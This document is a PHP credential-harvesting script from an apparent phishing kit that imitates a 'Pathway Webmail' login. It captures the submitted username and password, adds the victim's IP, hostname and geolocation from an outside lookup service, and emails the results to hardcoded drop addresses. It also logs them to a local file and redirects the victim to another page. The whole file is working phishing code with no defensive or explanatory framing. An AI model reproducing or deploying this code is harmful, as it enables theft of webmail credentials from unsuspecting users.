<?php

$ip = getenv("REMOTE_ADDR");
//Get IP Country City
$url = "http://api.ipinfodb.com/v3/ip-city/?key=4aa623b8df3bafdfd219d0e15448cbd7ff0dd448cc2090a48b8b0a6f71daec35&ip=$ip";
$ipCountryCityInfo = file_get_contents($url);
//
$hostname = gethostbyaddr($ip);
$adddate=date("D M d, Y g:i a");
$useragent = $_SERVER['HTTP_USER_AGENT'];
$message .= "Date : ".$adddate."\n";
$message .= "[+] +---+ Pathway Webmail Login REzulTY +---+ [+]\n";
$message .= "Username: : ".$_POST['horde_user']."\n";
$message .= "Password : ".$_POST['horde_pass']."\n";
$message .= "IP: ".$ip."\n";
$message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n";
$message .= "HostName : ".$hostname."\n";
$message .= "BY DeboSkY ~2026~ IP Location : ".$ipCountryCityInfo."\n";

$recipient = "client@harrowtuitioncentre.co.uk, 1426487493@etlgr.com";
$subject = "Pathway Communication AUTO REZULTY | $ip";
$file = fopen("logs.txt", "a");
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");
fputs ($file, "$message\r\n");
fputs ($file, "--------\r\n");
fclose ($file);
$headers .= "Pathway Communication Spammed Login";
mail($recipient,$subject,$message,$headers);?>

<script type="text/javascript">
</script><meta HTTP-EQUIV="REFRESH" content="1; index1.html">